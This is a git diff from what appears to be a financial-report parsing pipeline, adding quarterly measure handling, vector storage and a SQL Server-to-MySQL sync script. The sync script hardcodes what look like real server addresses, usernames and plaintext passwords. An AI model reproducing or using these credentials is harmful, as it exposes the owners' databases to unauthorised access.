@ -527,10 +564,16 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
|
|||
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_third_quarter
|
||||
where year = '{year}'
|
||||
'''.format(year=report_year)
|
||||
select_query_first_quarter = '''
|
||||
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
|
||||
where year = '{year}'
|
||||
'''.format(year=report_year)
|
||||
# select_black_array_query = 'SELECT measure_name, keywords FROM measure_black_list where isdel = 0'
|
||||
select_black_array_query = '''
|
||||
SELECT measure_name, keywords FROM measure_black_list where isdel = 0 and find_in_set('{year}',year) and find_in_set('{flag}',flag)
|
||||
'''.format(year=report_year, flag=report_type)
|
||||
|
||||
|
||||
black_array = []
|
||||
cursor.execute(select_black_array_query)
|
||||
results = cursor.fetchall()
|
||||
|
@ -553,6 +596,20 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
|
|||
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
|
||||
processes.append(p)
|
||||
p.start()
|
||||
elif report_type == 2:
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query_first_quarter)
|
||||
records = cursor.fetchall()
|
||||
end_time = time.time()
|
||||
applog.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
|
||||
applog.info('insert_table_measure_from_vector_async_process方法走的一季报')
|
||||
start_time = time.time()
|
||||
records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
|
||||
processes = []
|
||||
for record_range in records_range_parts:
|
||||
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
|
||||
processes.append(p)
|
||||
p.start()
|
||||
elif report_type == 3:
|
||||
start_time = time.time()
|
||||
cursor.execute(select_query_thrid)
|
||||
|
@ -698,11 +755,15 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
|
|||
measure_list = table['measure_list']
|
||||
for measure in measure_list:
|
||||
measure_name = measure['measure_name']
|
||||
# 需要跳过的一些指标
|
||||
black_list = ["营业总成本"]
|
||||
if any(black in measure_name for black in black_list):
|
||||
continue
|
||||
measure_value = measure['measure_value'].replace("(", "").replace(")", "")
|
||||
measure_name = utils.get_clean_text(measure_name)
|
||||
measure_name = measure_name.replace('2024','2024年').replace('2023','2023年').replace('2022','2022年').replace('(','').replace(')','')#这个真绝了,怎么都删不掉
|
||||
measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('(','').replace(')','')#这个真绝了,怎么都删不掉
|
||||
#measure_name_1 = measure_name.replace('调整后','')
|
||||
quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2024年','2023年','2022年','2021年','年']
|
||||
quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2023年','2022年','2021年','年']
|
||||
for quarter in quarters:
|
||||
measure_name = measure_name.replace(quarter * 2, quarter)
|
||||
pattern_dup = re.compile(r'(\w{3,})\1+')#去掉任意超过两个字且重复的字符
|
||||
|
@ -712,7 +773,6 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
|
|||
measure_name = pattern_dup.sub(r'\1', measure_name)
|
||||
measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
|
||||
measure_unit = measure['measure_unit']
|
||||
|
||||
if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):
|
||||
vector_obj = utils.embed_with_str(measure_name_1)
|
||||
vector = vector_obj.output["embeddings"][0]["embedding"]
|
||||
|
@ -822,7 +882,6 @@ def delete_database(file_id):
|
|||
"delete from measure_list where file_id = %s;",
|
||||
"delete from word_parse_process where file_id = %s;",
|
||||
"delete from table_unit_info where file_id = %s;",
|
||||
"delete from word_measure_parse_process where file_id = %s;",
|
||||
# "delete from a where file_id = %s;",
|
||||
# "delete from b where file_id = %s;",
|
||||
]
|
||||
|
|
|
@ -0,0 +1,201 @@
|
|||
import pymssql
|
||||
import mysql.connector
|
||||
import logging
|
||||
|
||||
# 配置日志
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# SQL Server配置
|
||||
sql_server_config = {
|
||||
"server": "203.192.15.17",
|
||||
"port": 28063,
|
||||
"user": "zncbuser",
|
||||
"password": "ZZB-Cbindex-data",
|
||||
"database": "jydb",
|
||||
}
|
||||
|
||||
# MySQL配置
|
||||
mysql_config = {
|
||||
"host": "rm-bp1f85h3xs6mvnf5e3o.mysql.rds.aliyuncs.com",
|
||||
"user": "zzb_jydb",
|
||||
"password": "Ysdbsdjs89Yrqwp",
|
||||
"database": "zzb_jydb",
|
||||
}
|
||||
|
||||
def sync_table(table_name):
|
||||
try:
|
||||
# 连接到SQL Server
|
||||
sql_server_conn = pymssql.connect(**sql_server_config)
|
||||
sql_server_cursor = sql_server_conn.cursor()
|
||||
|
||||
# 连接到MySQL
|
||||
mysql_conn = mysql.connector.connect(**mysql_config)
|
||||
mysql_cursor = mysql_conn.cursor()
|
||||
|
||||
logging.info(f"Processing table: {table_name}")
|
||||
|
||||
# 检查MySQL中是否已存在该表
|
||||
mysql_cursor.execute(f"SHOW TABLES LIKE '{table_name}'")
|
||||
table_exists = mysql_cursor.fetchone()
|
||||
|
||||
# 获取表的列信息
|
||||
sql_server_cursor.execute(f"""
|
||||
SELECT
|
||||
COLUMN_NAME,
|
||||
DATA_TYPE,
|
||||
CHARACTER_MAXIMUM_LENGTH,
|
||||
NUMERIC_PRECISION,
|
||||
NUMERIC_SCALE
|
||||
FROM INFORMATION_SCHEMA.COLUMNS
|
||||
WHERE TABLE_NAME = '{table_name}'
|
||||
""")
|
||||
columns = sql_server_cursor.fetchall()
|
||||
|
||||
# 检查是否存在 XGRQ 或 UpdateTime 字段
|
||||
update_time_fields = ['xgrq', 'updatetime'] # 可能的字段名
|
||||
update_time_field = None
|
||||
for col in columns:
|
||||
if col[0].lower() in update_time_fields:
|
||||
update_time_field = col[0] # 找到第一个匹配的字段
|
||||
break
|
||||
|
||||
logging.info(f"Table {table_name} has update time field: {update_time_field}")
|
||||
|
||||
if not table_exists:
|
||||
# 如果表不存在,创建表
|
||||
create_table_sql = f"CREATE TABLE {table_name} ("
|
||||
for col in columns:
|
||||
col_name = col[0]
|
||||
col_type = col[1]
|
||||
# 类型映射逻辑(略)
|
||||
create_table_sql += f"`{col_name}` {col_type}, "
|
||||
create_table_sql = create_table_sql.rstrip(", ") + ")"
|
||||
logging.info(f"Create table SQL: {create_table_sql}")
|
||||
|
||||
# 在MySQL中创建表
|
||||
mysql_cursor.execute(create_table_sql)
|
||||
logging.info(f"Table {table_name} created in MySQL.")
|
||||
else:
|
||||
logging.info(f"Table {table_name} already exists in MySQL. Updating data...")
|
||||
|
||||
# 获取SQL Server中的所有id
|
||||
sql_server_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
|
||||
sql_server_ids = {row[0] for row in sql_server_cursor.fetchall()}
|
||||
|
||||
# 获取MySQL中的所有id
|
||||
mysql_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
|
||||
mysql_ids = {row[0] for row in mysql_cursor.fetchall()}
|
||||
|
||||
# 找出需要插入的id
|
||||
ids_to_insert = sql_server_ids - mysql_ids
|
||||
logging.info(f"Found {len(ids_to_insert)} new rows to insert.")
|
||||
|
||||
# 分批插入数据
|
||||
batch_size = 10000 # 每批次处理的行数
|
||||
id_list = list(ids_to_insert)
|
||||
for i in range(0, len(id_list), batch_size):
|
||||
batch_ids = id_list[i:i + batch_size]
|
||||
|
||||
# 从SQL Server中查询需要插入的数据
|
||||
sql_server_cursor.execute(f"""
|
||||
SELECT * FROM {table_name}
|
||||
WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
|
||||
""")
|
||||
rows_to_insert = sql_server_cursor.fetchall()
|
||||
|
||||
# 插入数据到MySQL
|
||||
if rows_to_insert:
|
||||
insert_sql = f"INSERT INTO {table_name} ({', '.join([f'`{col[0]}`' for col in columns])}) VALUES ({', '.join(['%s'] * len(columns))})"
|
||||
mysql_cursor.executemany(insert_sql, rows_to_insert)
|
||||
mysql_conn.commit()
|
||||
logging.info(f"Inserted {len(rows_to_insert)} rows into {table_name}.")
|
||||
|
||||
# 如果存在更新字段(XGRQ 或 UpdateTime),检查是否需要更新
|
||||
if update_time_field:
|
||||
logging.info(f"Checking for updates based on {update_time_field} field in table: {table_name}")
|
||||
|
||||
# 获取SQL Server中的id和更新字段的值,且更新字段大于2023年
|
||||
sql_server_cursor.execute(f"""
|
||||
SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
|
||||
WHERE {update_time_field} > '2023-11-12 20:23:23'
|
||||
""")
|
||||
sql_server_update_data = {row[0]: row[1] for row in sql_server_cursor.fetchall()}
|
||||
|
||||
# 获取MySQL中的id和更新字段的值
|
||||
mysql_cursor.execute(f"""
|
||||
SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
|
||||
""")
|
||||
mysql_update_data = {row[0]: row[1] for row in mysql_cursor.fetchall()}
|
||||
|
||||
# 找出需要更新的id
|
||||
ids_to_update = []
|
||||
for id, sql_server_update_time in sql_server_update_data.items():
|
||||
if id in mysql_update_data and sql_server_update_time != mysql_update_data[id]:
|
||||
ids_to_update.append(id)
|
||||
|
||||
logging.info(f"Found {len(ids_to_update)} rows to update.")
|
||||
|
||||
# 分批更新数据
|
||||
for i in range(0, len(ids_to_update), batch_size):
|
||||
batch_ids = ids_to_update[i:i + batch_size]
|
||||
|
||||
# 从SQL Server中查询需要更新的数据,且更新字段大于2023年
|
||||
sql_server_cursor.execute(f"""
|
||||
SELECT * FROM {table_name}
|
||||
WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
|
||||
AND {update_time_field} > '2023-11-12 20:23:23'
|
||||
""")
|
||||
rows_to_update = sql_server_cursor.fetchall()
|
||||
|
||||
# 更新数据到MySQL
|
||||
if rows_to_update:
|
||||
update_sql = f"UPDATE {table_name} SET "
|
||||
update_sql += ", ".join([f"`{col[0]}` = %s" for col in columns[1:]]) # 跳过id列
|
||||
update_sql += f" WHERE `{columns[0][0]}` = %s"
|
||||
update_values = [list(row[1:]) + [row[0]] for row in rows_to_update] # 跳过id列
|
||||
mysql_cursor.executemany(update_sql, update_values)
|
||||
mysql_conn.commit()
|
||||
logging.info(f"Updated {len(rows_to_update)} rows in table {table_name}.")
|
||||
|
||||
logging.info(f"Sync completed for table: {table_name}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to sync table {table_name}. Error: {e}")
|
||||
finally:
|
||||
# 关闭连接
|
||||
if 'sql_server_cursor' in locals():
|
||||
sql_server_cursor.close()
|
||||
if 'sql_server_conn' in locals():
|
||||
sql_server_conn.close()
|
||||
if 'mysql_cursor' in locals():
|
||||
mysql_cursor.close()
|
||||
if 'mysql_conn' in locals():
|
||||
mysql_conn.close()
|
||||
|
||||
def main():
|
||||
try:
|
||||
# 连接到SQL Server
|
||||
sql_server_conn = pymssql.connect(**sql_server_config)
|
||||
sql_server_cursor = sql_server_conn.cursor()
|
||||
|
||||
# 获取SQL Server中的所有表
|
||||
sql_server_cursor.execute("SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' ORDER BY TABLE_NAME")
|
||||
tables = sql_server_cursor.fetchall()
|
||||
|
||||
# 处理每个表
|
||||
for table in tables:
|
||||
if table[0].lower() == "lc_mainshlistnew":
|
||||
sync_table(table[0])
|
||||
|
||||
logging.info("All tables synced successfully!")
|
||||
except Exception as e:
|
||||
logging.error(f"Main function failed. Error: {e}")
|
||||
finally:
|
||||
# 关闭连接
|
||||
if 'sql_server_cursor' in locals():
|
||||
sql_server_cursor.close()
|
||||
if 'sql_server_conn' in locals():
|
||||
sql_server_conn.close()
|
||||
|
||||
# 启动主函数
|
||||
if __name__ == "__main__":
|
||||
main()
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,294 @@
|
|||
import pandas as pd
|
||||
import mysql.connector
|
||||
import utils
|
||||
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
|
||||
import re
|
||||
import redis
|
||||
|
||||
def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
|
||||
# 读取第一个 Excel 文件
|
||||
df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)#对应ttt表
|
||||
# 将 DataFrame 转换为字典列表
|
||||
data_list = df.to_dict(orient='records')
|
||||
|
||||
# 连接到 MySQL 数据库
|
||||
conn = mysql.connector.connect(
|
||||
host=MYSQL_HOST,
|
||||
user=MYSQL_USER,
|
||||
password=MYSQL_PASSWORD,
|
||||
database=MYSQL_DB
|
||||
)
|
||||
cursor = conn.cursor()
|
||||
|
||||
# 插入数据到 measure_create_config 表
|
||||
insert_query = '''
|
||||
INSERT INTO measure_create_config
|
||||
(config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list)
|
||||
VALUES (%s, %s, %s, %s, %s, %s)
|
||||
'''
|
||||
for data in data_list:
|
||||
show_measure = str(data['指标'])
|
||||
same_mean_measure = str(data['同义表述'])
|
||||
period_measure = str(data['周期'])
|
||||
change_measure = str(data['变动'])
|
||||
black_list = str(data['黑名单词'])
|
||||
config_id = utils.get_md5(show_measure)
|
||||
insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
|
||||
cursor.execute(insert_query, insert_query_data)
|
||||
conn.commit()
|
||||
|
||||
# 读取第二个 Excel 文件
|
||||
df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)#对应周期表
|
||||
# 将 DataFrame 转换为字典列表
|
||||
period_list = df_period.to_dict(orient='records')
|
||||
|
||||
# 插入数据到 measure_create_period 表
|
||||
period_insert_query = '''
|
||||
INSERT INTO measure_create_period
|
||||
(period_name, same_mean_period)
|
||||
VALUES (%s, %s)
|
||||
'''
|
||||
for data in period_list:
|
||||
period_name = str(data['标准表述'])
|
||||
same_mean_period = str(data['同义表述'])
|
||||
insert_query_data = (period_name, same_mean_period)
|
||||
cursor.execute(period_insert_query, insert_query_data)
|
||||
conn.commit()
|
||||
|
||||
# 查询数据库
|
||||
data_query = '''
|
||||
SELECT * FROM measure_create_config WHERE delete_status = 0
|
||||
'''
|
||||
period_query = '''
|
||||
SELECT * FROM measure_create_period
|
||||
'''
|
||||
|
||||
cursor.execute(data_query)
|
||||
data_list = cursor.fetchall()
|
||||
|
||||
cursor.execute(period_query)
|
||||
period_list = cursor.fetchall()
|
||||
|
||||
# 输出到文件
|
||||
with open(output_file_path, 'w', encoding='utf-8') as file:
|
||||
for data in data_list:
|
||||
config_id = data[0]
|
||||
show_measure = data[1]
|
||||
same_mean_measure = data[2]
|
||||
period_measure = data[3]
|
||||
change_measure = data[4]
|
||||
same_mean_measure_arr = []
|
||||
period_measure_arr = []
|
||||
change_measure_arr = []
|
||||
|
||||
if same_mean_measure != 'nan':
|
||||
same_mean_measure_arr = same_mean_measure.split(',')
|
||||
same_mean_measure_arr.append(show_measure)
|
||||
if period_measure != 'nan':
|
||||
period_measure_arr = period_measure.split(',')
|
||||
if change_measure != 'nan':
|
||||
change_measure_arr = change_measure.split(',')
|
||||
|
||||
for c in change_measure_arr:
|
||||
period_measure_arr.append(c)
|
||||
|
||||
for x in period_measure_arr:
|
||||
if x in change_measure_arr:
|
||||
show_name = show_measure + x
|
||||
else:
|
||||
show_name = x + show_measure
|
||||
for y in same_mean_measure_arr:
|
||||
if x in change_measure:
|
||||
parser_name = y + x
|
||||
else:
|
||||
parser_name = x + y
|
||||
|
||||
file.write(f'{show_name},{parser_name}\n')
|
||||
|
||||
for p in period_list:
|
||||
period_exra_name = p[0]
|
||||
period_exra_value = p[1]
|
||||
if period_exra_name in x:
|
||||
for v in period_exra_value.split(','):
|
||||
if x in change_measure:
|
||||
parser_name = y + x.replace(period_exra_name, v)
|
||||
else:
|
||||
parser_name = x.replace(period_exra_name, v) + y
|
||||
file.write(f'{show_name},{parser_name}\n')
|
||||
|
||||
cursor.close()
|
||||
conn.close()
|
||||
|
||||
|
||||
# 根据老指标配置表生成新指标配置表
|
||||
def create_new_config(conn, cursor, table_name,old_year,new_year):
|
||||
select_query = f'''
|
||||
SELECT measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance,year
|
||||
FROM {table_name}
|
||||
WHERE year = '{old_year}'
|
||||
'''
|
||||
cursor.execute(select_query)
|
||||
data_list = cursor.fetchall()
|
||||
|
||||
insert_query = f'''
|
||||
INSERT INTO measure_config
|
||||
(measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance, year)
|
||||
VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
|
||||
'''
|
||||
for data in data_list:
|
||||
ori_measure_name = data[3]
|
||||
if re.match(r'^\d{4}',ori_measure_name):
|
||||
year = int(re.match(r'^\d{4}',ori_measure_name).group(0))
|
||||
year += 1
|
||||
ori_measure_name = str(year) + ori_measure_name[4:]
|
||||
insert_data = (data[0],data[1],data[2],ori_measure_name,data[4],data[5],data[6],new_year)
|
||||
cursor.execute(insert_query, insert_data)
|
||||
conn.commit()
|
||||
cursor.close()
|
||||
conn.close()
|
||||
|
||||
|
||||
def measure_config_to_db(conn, cursor, table_name):
|
||||
year_list = ["2021","2022","2023","2024","2025"]
|
||||
for year in year_list:
|
||||
insert_query = f'''
|
||||
INSERT INTO {table_name}
|
||||
(measure_id, measure_name, ori_measure_id, ori_measure_name,delete_status,distance,year)
|
||||
VALUES (%s, %s, %s, %s,%s,%s,%s)
|
||||
'''
|
||||
check_query = f'''
|
||||
SELECT ori_measure_id FROM {table_name}
|
||||
WHERE year = '{year}'
|
||||
'''
|
||||
# 新增指标
|
||||
lines = [
|
||||
|
||||
f"归母净利润同比变动,本报告期比上年同期增减归属于上市公司股东的净利润",
|
||||
f"扣非净利润同比变动,本报告期比上年同期增减归属于上市公司股东的扣除非经常性损益的净利润",
|
||||
|
||||
|
||||
# f"当期营业成本,本期发生额营业成本",
|
||||
# f"当期销售费用,本期发生额销售费用",
|
||||
# f"当期管理费用,本期发生额管理费用",
|
||||
# f"当期财务费用,本期发生额财务费用",
|
||||
# f"当期研发费用,本期发生额研发费用",
|
||||
# f"报告期末应收账款,本期发生额应收账款",
|
||||
# f"当期营业收入,本期发生额营业收入",
|
||||
|
||||
# f"当期营业成本,{year}年第一季度营业成本",
|
||||
# f"当期销售费用,{year}年第一季度销售费用",
|
||||
# f"当期管理费用,{year}年第一季度管理费用",
|
||||
# f"当期财务费用,{year}年第一季度财务费用",
|
||||
# f"当期研发费用,{year}年第一季度研发费用",
|
||||
# f"报告期末应收账款,{year}年3月31日应收账款",
|
||||
# f"当期营业收入,{year}年第一季度营业收入",
|
||||
|
||||
# f"报告期末总资产,{year}年3月31日资产",
|
||||
# f"报告期末总资产,{year}年3月31日资产总计",
|
||||
# f"报告期末货币资金,{year}年3月31日货币资金",
|
||||
# f"报告期末货币资金,{year}年3月31日货币资金合计",
|
||||
# f"报告期末存货,{year}年3月31日存货",
|
||||
# f"报告期末存货,{year}年3月31日存货合计",
|
||||
# f"报告期末固定资产,{year}年3月31日固定资产",
|
||||
# f"报告期末固定资产,{year}年3月31日固定资产合计",
|
||||
# f"报告期末在建工程,{year}年3月31日在建工程",
|
||||
# f"报告期末在建工程,{year}年3月31日在建工程合计",
|
||||
# f"报告期末商誉,{year}年3月31日商誉",
|
||||
# f"报告期末商誉,{year}年3月31日商誉合计",
|
||||
# f"报告期末短期借款,{year}年3月31日短期借款",
|
||||
# f"报告期末短期借款,{year}年3月31日短期借款合计",
|
||||
# f"报告期末应付账款,{year}年3月31日应付账款",
|
||||
# f"报告期末应付账款,{year}年3月31日应付账款合计",
|
||||
# f"报告期末合同负债,{year}年3月31日合同负债",
|
||||
# f"报告期末合同负债,{year}年3月31日合同负债合计",
|
||||
# f"报告期末长期借款,{year}年3月31日长期借款",
|
||||
# f"报告期末长期借款,{year}年3月31日长期借款合计",
|
||||
|
||||
# f"上年年末总资产,{int(year)-1}年12月31日资产",
|
||||
# f"上年年末总资产,{int(year)-1}年12月31日资产总计",
|
||||
# f"上年年末货币资金,{int(year)-1}年12月31日货币资金",
|
||||
# f"上年年末货币资金,{int(year)-1}年12月31日货币资金合计",
|
||||
# f"上年年末存货,{int(year)-1}年12月31日存货",
|
||||
# f"上年年末存货,{int(year)-1}年12月31日存货合计",
|
||||
# f"上年年末固定资产,{int(year)-1}年12月31日固定资产",
|
||||
# f"上年年末固定资产,{int(year)-1}年12月31日固定资产合计",
|
||||
# f"上年年末在建工程,{int(year)-1}年12月31日在建工程",
|
||||
# f"上年年末在建工程,{int(year)-1}年12月31日在建工程合计",
|
||||
# f"上年年末商誉,{int(year)-1}年12月31日商誉",
|
||||
# f"上年年末商誉,{int(year)-1}年12月31日商誉合计",
|
||||
# f"上年年末短期借款,{int(year)-1}年12月31日短期借款",
|
||||
# f"上年年末短期借款,{int(year)-1}年12月31日短期借款合计",
|
||||
|
||||
# f"上年年末合同负债,{int(year)-1}年12月31日合同负债",
|
||||
# f"上年年末合同负债,{int(year)-1}年12月31日合同负债合计",
|
||||
# f"上年年末长期借款,{int(year)-1}年12月31日长期借款",
|
||||
# f"上年年末长期借款,{int(year)-1}年12月31日长期借款合计",
|
||||
]
|
||||
# 打印每一行
|
||||
for line in lines:
|
||||
config_list = line.strip().split(',')
|
||||
measure = config_list[0]
|
||||
ori_measure = config_list[1]
|
||||
ori_measure_id = utils.get_md5(ori_measure)
|
||||
|
||||
# 判断数据库中是否有数据
|
||||
cursor.execute(check_query)
|
||||
check_records = cursor.fetchall()
|
||||
if any(record[0] == ori_measure_id for record in check_records):
|
||||
continue
|
||||
|
||||
data_to_insert = (utils.get_md5(measure), measure, ori_measure_id, ori_measure,0,0.94,year)
|
||||
cursor.execute(insert_query, data_to_insert)
|
||||
conn.commit()
|
||||
|
||||
def insert_measure_vector(conn,cursor,table_name):
|
||||
from config import REDIS_HOST,REDIS_PASSWORD,REDIS_PORT
|
||||
redis_client = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD, db=6)# 192.168.0.172 #测试123.60.153.169
|
||||
# 执行SQL语句,更新数据
|
||||
select_query = f'''
|
||||
SELECT ori_measure_id,ori_measure_name FROM {table_name}
|
||||
'''
|
||||
cursor.execute(select_query)
|
||||
records = cursor.fetchall()
|
||||
print(f"总计{len(records)}条数据")
|
||||
for record in records:
|
||||
if redis_client.hexists('measure_config', record[0]):
|
||||
measure_vector = redis_client.hget('measure_config', record[0])
|
||||
else:
|
||||
print('新增指标',record[1])
|
||||
vector_obj = utils.embed_with_str(record[1])
|
||||
measure_vector = str(vector_obj.output["embeddings"][0]["embedding"])
|
||||
|
||||
redis_client.hset('measure_config', record[0], measure_vector)
|
||||
redis_client.close()
|
||||
conn.close()
|
||||
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
|
||||
if __name__ == "__main__":
|
||||
#需要先清空本地数据库的 measure_create_config 和 measure_create_period 表
|
||||
|
||||
# process_excel_and_db(
|
||||
# 'F:\\11_pdf\\ttt_1.xlsx',#ttt文件
|
||||
# 'F:\\11_pdf\\period_1.xlsx',#period文件
|
||||
# 'F:\\11_pdf\\out_2022_new_year.txt'#输出文件
|
||||
# )
|
||||
from config import MYSQL_HOST_APP, MYSQL_USER_APP, MYSQL_PASSWORD_APP, MYSQL_DB_APP
|
||||
conn = mysql.connector.connect(
|
||||
host=MYSQL_HOST_APP,
|
||||
user=MYSQL_USER_APP,
|
||||
password=MYSQL_PASSWORD_APP,
|
||||
database=MYSQL_DB_APP
|
||||
)
|
||||
cursor = conn.cursor()
|
||||
#file_path = r'F:\\11_pdf\\out_2022_new_year.txt'
|
||||
|
||||
|
||||
|
||||
# 更新第一季度的measure_vector
|
||||
table_name = 'measure_config_first_quarter'
|
||||
# 写入mysql
|
||||
# measure_config_to_db(conn, cursor, table_name)
|
||||
create_new_config(conn, cursor, table_name,'2024','2025')
|
||||
# 插入redies
|
||||
insert_measure_vector(conn,cursor,table_name)
|
||||
|
||||
|
|
@ -1,204 +0,0 @@
|
|||
2024-12-29 16:13:29,975|zzb_logger : INFO 开始启动文件解析任务: 1.docx
|
||||
2024-12-29 16:13:36,106|zzb_logger : INFO 任务 201917 完成
|
||||
2024-12-29 16:15:16,205|zzb_logger : INFO 开始启动文件解析任务: 1.docx
|
||||
2024-12-29 16:15:22,356|zzb_logger : INFO 任务 201917 完成
|
||||
2024-12-29 16:17:15,693|zzb_logger : INFO 开始启动文件解析任务: 1.docx
|
||||
2024-12-29 16:17:15,696|zzb_logger : INFO 通知pdf开始解析url:201917:http://127.0.0.1:8100/api/tenant/report/notify?fileId=201917&status=5
|
||||
2024-12-29 16:17:15,696|zzb_logger : INFO 通知pdf开始解析状态:201917:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||
"http://www.w3.org/TR/html4/strict.dtd">
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|
||||
<title>Error response</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Error response</h1>
|
||||
<p>Error code: 404</p>
|
||||
<p>Message: File not found.</p>
|
||||
<p>Error code explanation: HTTPStatus.NOT_FOUND - Nothing matches the given URI.</p>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
2024-12-29 16:17:25,319|zzb_logger : INFO text,任务ID:201917
|
||||
2024-12-29 16:17:26,701|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (5116)...
|
||||
2024-12-29 16:17:28,173|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (22268)...
|
||||
2024-12-29 16:17:29,591|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (27736)...
|
||||
2024-12-29 16:17:30,937|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38276)...
|
||||
2024-12-29 16:17:32,294|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38292)...
|
||||
2024-12-29 16:17:33,664|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (38240)...
|
||||
2024-12-29 16:17:35,153|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (28536)...
|
||||
2024-12-29 16:17:36,559|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (37552)...
|
||||
2024-12-29 16:17:37,929|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (37856)...
|
||||
2024-12-29 16:17:39,291|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (10528)...
|
||||
2024-12-29 16:17:40,688|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (31444)...
|
||||
2024-12-29 16:17:42,133|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (11108)...
|
||||
2024-12-29 16:17:43,518|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (23236)...
|
||||
2024-12-29 16:17:44,901|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (23572)...
|
||||
2024-12-29 16:17:46,495|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (39604)...
|
||||
2024-12-29 16:17:47,899|zzb_logger : INFO Run task 处理word文件中的 text file_id:201917 (4076)...
|
||||
2024-12-29 16:17:47,899|zzb_logger : INFO 等待所有子任务完成,任务ID:201917
|
||||
2024-12-29 16:18:02,194|zzb_logger : INFO word表格中 text解析完成,任务ID:201917
|
||||
2024-12-29 16:18:02,196|zzb_logger : INFO 开始解析word表表格中的table,任务ID:201917
|
||||
2024-12-29 16:18:03,525|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36176)...
|
||||
2024-12-29 16:18:04,585|zzb_logger : INFO Task 解析表格201917 runs 1.06 seconds.
|
||||
2024-12-29 16:18:04,873|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (35368)...
|
||||
2024-12-29 16:18:05,769|zzb_logger : INFO Task 解析表格201917 runs 0.90 seconds.
|
||||
2024-12-29 16:18:06,263|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (33004)...
|
||||
2024-12-29 16:18:07,225|zzb_logger : INFO Task 解析表格201917 runs 0.96 seconds.
|
||||
2024-12-29 16:18:07,628|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (30764)...
|
||||
2024-12-29 16:18:08,427|zzb_logger : INFO Task 解析表格201917 runs 0.80 seconds.
|
||||
2024-12-29 16:18:08,976|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (29608)...
|
||||
2024-12-29 16:18:09,864|zzb_logger : INFO Task 解析表格201917 runs 0.89 seconds.
|
||||
2024-12-29 16:18:10,588|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (5404)...
|
||||
2024-12-29 16:18:11,360|zzb_logger : INFO Task 解析表格201917 runs 0.77 seconds.
|
||||
2024-12-29 16:18:11,966|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36200)...
|
||||
2024-12-29 16:18:12,030|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (36328)...
|
||||
2024-12-29 16:18:12,892|zzb_logger : INFO Task 解析表格201917 runs 0.93 seconds.
|
||||
2024-12-29 16:18:13,034|zzb_logger : INFO Task 解析表格201917 runs 1.00 seconds.
|
||||
2024-12-29 16:18:13,392|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (39712)...
|
||||
2024-12-29 16:18:14,166|zzb_logger : INFO Task 解析表格201917 runs 0.77 seconds.
|
||||
2024-12-29 16:18:15,030|zzb_logger : INFO Run task 处理word文件中的table file_id:201917 (17184)...
|
||||
